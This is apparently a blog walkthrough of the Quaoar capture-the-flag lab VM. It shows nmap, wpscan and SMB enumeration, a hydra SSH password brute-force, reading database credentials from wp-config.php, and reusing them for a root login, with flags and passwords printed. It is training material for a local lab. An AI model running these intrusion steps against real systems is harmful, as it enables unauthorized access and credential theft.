Penetration Test Training – Quaoar

For anyone interested in Penetration Testing and IT Security, there is the need to test the theoretical skills you might have acquired. To give people who are interested a means to do so without violating the law, Capture-the-Flag (CTF) Images exist. A CTF challenge is (usually) a virtual machine especially crafted with security vulnerabilities in it. The flags are text files that you must discover.
Previously, we solved the LazySysAdmin CTF challenge – today we’re using the Quaoar VM from vulnhub.

To get this VM, either to tag along while reading or if you’re interested and want to solve it by yourself, download it and import it into VirtualBox. A word of advice: Never let a downloaded VM directly into your network. Use a host-only network to reach the virtual machine from your host machine.

But now, let’s get started!
Remember to save anything that looks like it’s a username or could be a password in a file. This information might be useful later on.

The Quaoar-VM is set up to use the network adapter vboxnet0. So as a first step, we need to find it on the network.

$ netdiscover -i vboxnet0
192.168.99.101

As we’ll need that IP Adress a few times, I’ll export it to save myself some typing.

$ export IP=192.168.99.101

Now we can use $IP instead of typing it out all the time.

Enumeration

To get a general overview of the target machine, the ports are enumerated with

$ nmap -A $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:51 CET
Nmap scan report for 192.168.99.101
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
[...]
53/tcp  open  domain      ISC BIND 9.8.1-P1
[...]
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
[...]
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 listed post-login have SASL-IR ID ENABLE STARTTLS capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 IMAP4rev1 more post-login have SASL-IR ID ENABLE listed capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-11-06T16:51:39-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds

So we got to know quite a lot about the system. We have open ports for ssh, http, smb and pop3 – among others. We also know there is an apache webserver running on port 80 and according to the robots.txt there is a wordpress installation.

WordPress

Let’s see what wpscan tells us about that wordpress instance:

$ wpscan --url $IP
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.99.101/wordpress/
[+] Started: Mon Nov 6 21:55:33 2017

[!] The WordPress 'http://192.168.99.101/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.99.101/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.99.101/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.99.101/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 20 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
[...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
[...]
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default 
Reference: https://wpvulndb.com/vulnerabilities/8719 
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF) 
Reference: https://wpvulndb.com/vulnerabilities/8720
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG) 
Reference: https://wpvulndb.com/vulnerabilities/8721 
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection 
Reference: https://wpvulndb.com/vulnerabilities/8730 
[...]
[i] Fixed in: 3.9.16 

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata 
Reference: https://wpvulndb.com/vulnerabilities/8765 
[...]
[i] Fixed in: 3.9.17 

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation 
Reference: https://wpvulndb.com/vulnerabilities/8766 
[...]
[i] Fixed in: 3.9.17 

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset 
Reference: https://wpvulndb.com/vulnerabilities/8807 
[...] 

[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation 
Reference: https://wpvulndb.com/vulnerabilities/8815 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC Reference: https://wpvulndb.com/vulnerabilities/8816 
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/ 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks 
Reference: https://wpvulndb.com/vulnerabilities/8817 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF 
Reference: https://wpvulndb.com/vulnerabilities/8818 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS 
Reference: https://wpvulndb.com/vulnerabilities/8819 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF 
Reference: https://wpvulndb.com/vulnerabilities/8820 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
[...]
[i] Fixed in: 4.7.5

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
[...]
[i] Fixed in: 3.9.21

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
| Last updated: 2017-06-08T00:00:00.000Z
| Location: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Nov 6 21:55:37 2017
[+] Requests Done: 49
[+] Memory used: 32.5 MB
[+] Elapsed time: 00:00:03

Ok, that’s quite a lot of information. To process. But before focussing too much on wordpress, we’ll stick to enumeration for now. Let’s take a look at the samba-shares.

Samba

Enumerate the users first. Luckily, there’s a nmap-script for that:

$ nmap --script smb-enum-users.nse -p 445 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:58 CET
Nmap scan report for 192.168.99.101
Host is up (0.00089s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-users:
| QUAOAR\nobody (RID: 501)
| Full name: nobody
| Description:
| Flags: Normal user account
| QUAOAR\root (RID: 1001)
| Full name: root
| Description:
| Flags: Normal user account
| QUAOAR\viper (RID: 1000)
| Full name: viper
| Description:
| Flags: Normal user account
| QUAOAR\wpadmin (RID: 1002)
| Full name:
| Description:
|_ Flags: Normal user account

Ok. So we see some usernames: nobody, root, viper and wpadmin. We’ll take note of them. Now we can check if there are any shares accessible:

$ nmap --script smb-enum-shares.nse -p 445 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 22:01 CET
Nmap scan report for 192.168.99.101
Host is up (0.00067s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.99.101\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Quaoar server (Samba, Ubuntu))
| Users: 1
| Max Users:
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.99.101\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users:
| Path: C:\var\lib\samba\printers
| Anonymous access:
|_ Current user access:

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

This looks like we’re on to something here. A guest share with read/write access! We can now try to connect to that share!

$ smbclient //$IP/IPC$ -N

The prompt changes. Looks like we’re in!

smb: \>

Unfortunately, we can’t do anything on here:

smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*

Let’s leave that trace for now. We gathered quite a lot of information already and can try to gain access with the information.

Attack

With everything we discovered so far, we’re ready to take hydra for a spin and check if we already have valid credentials. Hydra is a login cracker that supports a lot of common protocols. The

info.txt

is the file where I saved everything that looked like a user account or a possible password during enumeration.

$ hydra -L info.txt -P info.txt -u $IP ssh -t 4
[22][ssh] host: 192.168.99.101 login: wpadmin password: wpadmin

Ok, we got our entry point!

$ ssh wpadmin@$IP

Let’s check if we have any interesting groups assigned.

$ id
uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)

Nothing. But we have our first flag.

$ ls
flag.txt

$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

It’s safe to assume the user wpadmin has at least read-rights for the wordpress installation. Let’s check it out and see if we get some more information!

cd /var/www/wordpress
cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

Another password, great! Let’s see, if this is the real root password for this box:

$ ssh root@$IP
root@192.168.99.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Nov 6 18:40:50 EST 2017

System load: 0.47 Processes: 95
Usage of /: 29.9% of 7.21GB Users logged in: 0
Memory usage: 32% IP address for eth0: 192.168.99.101
Swap usage: 0% IP address for virbr0: 192.168.122.1

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com

OK, let’s see.

root@Quaoar:~# ls
flag.txt vmware-tools-distrib

Now we have the second flag.

root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb

Learnings

We got it. Time to take a step back and have a look what we learned during the penetration test of this VM:

• Enumeration is key. There’s a lot information hidden in plain sight.
• If you’re running any sort of service, don’t reuse passwords.
• Disable everything you do not need on your systems.